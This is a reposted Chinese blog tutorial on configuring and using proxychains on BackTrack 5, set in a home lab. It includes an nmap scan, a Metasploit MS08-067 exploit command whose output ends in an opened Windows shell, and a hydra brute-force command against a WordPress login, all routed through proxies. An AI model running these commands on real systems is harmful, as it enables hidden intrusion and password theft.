记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

proxychains配置与使用介绍

2013-03-09 09:49
ProxyChains是在Linux and other Unices下的代理工具.最新版本3.1,还有GUI版的.下载地址及说明:proxychains

proxychains介绍:

  • 允许TCP和DNS通过代理隧道.
  • 支持HTTP,SOCKS4和SOCKS5代理服务器.
  • 不同的代理类型可以混合在同一个链.
  • 代理链:用户自定义的列表的代理链接在一起.
可以使用proxychains通过代理服务器运行任何程序和通过反向代理访问内部网络. 这里介绍它主要以后文章中有用到 就不过多解释. 官方有使用说明how to Configuration: proxychains looks for config file in following order: 1) ./proxychains.conf 2) $(HOME)/.proxychains/proxychains.conf 3) /etc/proxychains.conf ** **see more in /etc/proxychains.conf 如何使用这里搭建环境,本机windows7+虚拟机backtrack5 r3进行测试. 代理的话我本机用的是某vpn登陆器开启代理,ip为美国.然后通过ccproxy设置一个帐号密码,配置socks和http代理端口,然虚拟机共享代理. 虚拟机的浏览器通过代理访问的话,配置下network就行. 访问会提示输入帐号密码 就填写之前配置的ccproxy的帐号密码就行 这里不扯这个.

proxychains.conf配置

backtrack下的proxychains配置文件为/etc/proxychains,我们打开进行配置说明gedit /etc/proxychains.conf
# proxychains.conf  VER 3.1

#dynamic_chain

strict_chain

#random_chain

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns 

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
socks5	192.168.1.2	1080	test	123456
详细的配置说明列表:
属性 说明 配置
dynamic_chain 按照列表中出现的代理服务器的先后顺序组成一条链,如果有代理服务器失效,则自动将其排除,但至少要有一个是有效的. 默认#未开启
strict_chain 按照后面列表中出现的代理服务器的先后顺序组成一条链,要求所有的代理服务器都是有效的. 默认开启
random_chain 列表中的任何一个代理服务器都可能被选择使用,这种方式很适合网络扫描操作(参数chain_len只对random_chain有效). 默认#未开启
proxy_dns 代理dns请求 默认开启
ProxyList 添加代理列表,如http、socks4/5、auth user/pass 默认
其他未说明的默认即可,这里就本次环境进行简单配置.proxychains给出的三种模式,选择strict_chain默认的,proxy_dns默认是开启的,如果出错就改为google dns 8.8.8.8测试哈(Tips:这功能应该类似远程管理软件的功能,自己搭建dns解析,然后在跳vpn,速度是有点慢些,但是安全性高点),不会的就默认或#,ProxyList我这里设置为socks5 192.168.1.2 1080 test 123456,ip为本机,端口和帐号密码就是ccproxy的配置,这样就配置好了.

proxychains使用

proxychains nmap测试
root@bt:~# proxychains nmap -vvv -n -sT -PN -p 80 www.pentesting.cc
proxychains metasploit测试
root@bt:~# proxychains msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.9 PAYLOAD=windows/shell/bind_tcp E
ProxyChains-3.1 (http://proxychains.sf.net)
[*] Please wait while we load the module tree...
|DNS-request| 0.0.0.0 
dig: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/lib/libdns.so.64)
dig: /opt/metasploit/common/lib/libxml2.so.2: no version information available (required by /usr/lib/libisc.so.60)
|S-chain|-<>-192.168.1.2:1081-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: 0.0.0.0 is not exist
|DNS-request| localhost 
dig: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/lib/libdns.so.64)
dig: /opt/metasploit/common/lib/libxml2.so.2: no version information available (required by /usr/lib/libisc.so.60)
|S-chain|-<>-192.168.1.2:1081-<><>-4.2.2.2:53-<><>-OK
|DNS-response| localhost is 127.0.0.1
|S-chain|-<>-192.168.1.2:1081-<><>-127.0.0.1:7337-<--timeout
|DNS-request| localhost 
dig: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/lib/libdns.so.64)
dig: /opt/metasploit/common/lib/libxml2.so.2: no version information available (required by /usr/lib/libisc.so.60)
|S-chain|-<>-192.168.1.2:1081-<><>-4.2.2.2:53-<><>-OK
|DNS-response| localhost is 127.0.0.1
|S-chain|-<>-192.168.1.2:1081-<><>-127.0.0.1:7337-<--timeout
|DNS-request| localhost 
dig: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/lib/libdns.so.64)
dig: /opt/metasploit/common/lib/libxml2.so.2: no version information available (required by /usr/lib/libisc.so.60)
|S-chain|-<>-192.168.1.2:1081-<><>-4.2.2.2:53-<><>-OK
|DNS-response| localhost is 127.0.0.1
|S-chain|-<>-192.168.1.2:1081-<><>-127.0.0.1:7337-<--timeout
[-] Failed to connect to the database: could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 7337?

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

RHOST => 192.168.1.9
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
|S-chain|-<>-192.168.1.2:1081-<><>-192.168.1.9:445-|S-chain|-<>-192.168.1.2:1081-<><>-192.168.1.9:4444-<><>-OK
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Chinese - Traditional
[*] Selected Target: Windows 2000 Universal
<--timeout
[*] Attempting to trigger the vulnerability...
|S-chain|-<>-192.168.1.2:1081-<><>-192.168.1.9:4444-<><>-OK
[*] Sending stage (240 bytes) to 192.168.1.9
[*] Command shell session 1 opened (192.168.1.6:40928 -> 192.168.1.2:1081) at 2012-12-12 08:27:02 +0800

Microsoft Windows 2000 [Version 5.00.2195]
(C) 1985-2000 Microsoft Corp.

C:\WINNT\system32>
其他测试说明:
proxychains ssh -D proxyport IP proxychains wget http://ifconfig.me/ip proxychains hydra -V -f -l admin -P /root/Desktop/pass.txt IP http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:ERROR"

proxychains配置与使用介绍

知识来源: www.pentesting.cc/proxychains-configuration-and-use-introduction.html

阅读:3959044 | 评论:0 | 标签:backtrack tools proxychains metasploit proxychains nmap prox

想收藏或者和大家分享这篇好文章→复制链接地址

“proxychains配置与使用介绍”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云